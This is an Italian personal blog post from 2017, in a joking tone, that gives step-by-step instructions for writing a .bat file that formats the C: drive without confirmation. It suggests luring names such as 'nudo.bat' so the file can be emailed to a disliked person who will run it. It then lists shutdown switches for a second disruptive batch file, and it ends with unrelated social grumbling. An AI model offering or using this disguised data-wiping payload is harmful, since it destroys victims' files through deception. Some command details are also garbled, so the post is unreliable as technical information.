domenica 5 novembre 2017

Le cattiverie di un programmatore.


Considerato che la lunga siccita' e' finita mi sento in vena di far danni sotto una pioggia che cerchera' di spegnere i focolai della valle mentre in piazza ci stanno 4 o 5 persone pernonsocosa e saltando di frasca in palo, per far capire quanto e’ semplice e pericoloso leggere le mail, posto per chi condivide i miei sentimenti bellici due dritte o tre per azzerare un computer di chi vi sta sul biip formattando il suo Hdisco C con poche manovre..donc.. uscite le umbrella e dateci dentro col picci..fate come io...
1) Apro il blocco note
2) scrivo
formatC: /autotest /q /u
Salvo con un nome accattivante secondo la persona a cui mandero’ la posta con estensione .bat
Ad es:
eccomi.bat (se so’ che esiste curiosita’ di vedere il togo tuentinain).
ilmiocane.bat (se la vittima e’ amante di animali amici dell’uomo).
nudo.bat (se e’ amante di altre cose a.mene).
tutto_sul_condominio.bat (questa e’ per il condomino del 5° piano).
come_fare-il_tecnico (per il pistola che dico io).
e la invio a chi voglio male e fa’ l’equilibrista (nel senso che mi sta’ sulle palle)…
Per spiegare il /q (significa,senza chiedere conferma) e il /u (significa, non permettere di essere bloccata la mia manovra distruttiva)..
Chi lo ricevera’, aprendoli si trovera’ il computer azzerato di tutto..di un bel nero che piu’ nero non si puo’..nemmeno col candeggio contrario e nn pretendo alcun bitcoin.
Se invece mi sento magnanimo e voglio sconnettere il suo PC, riavviarlo per poi spegnerlo definitivamente, vado ancora nel blocco note inserisco il seguente codice..shutdown –(comando) e lo salvo in bat..al posto della parola tra parentesi mettero’ ovviamente senza parentesi:
a)
-i : Attivo l’interfaccia utente grafica (shutdown –i )
b) -l : Disconnetto l’utente (shutdown –l)
c)
-r : Riavvio il PC (shutdown –r)
d)
-s : Spengo il computer (shutdown –s)
e)
-t 45 (dove 45 sono i secondi di attesa prima della chiusura di Windows e darete cosi’ il tempo col conteggio alla rovescia alla vittima per dire una preghiera prima della fine). (shutdown –t 45)
f) -f : Chiudo le applicazioni ancora aperte (shutdown –f)
Semplice vero? Dagli amici mi guardi Iddio.. che a xXxX ci penso io.
ps.. nn mi chiedete di aggiustarvi il pc in quanto sapete come scassarvelo da soli e cercate di non seguire il mio scritto italcarliano...ehmm.. ringrazio per il 1mastico di ieri e stavo dimenticando la liturgia odierna del five november secondo togotuentinain. Mi rivolgo ai giovani farisaici che vivono o vegetano per farsi notare 24H sui social da quando si lavano i denti a quando vanno a letto e fanno un continuo mostrare di se' e delle cose che fanno, anche futili e talvolta stupide pur di farse notare...
finito il predicozzo in fase mozza e senza senso, vi lascio alla striscia del buon Ste che vive di politica e..vive bene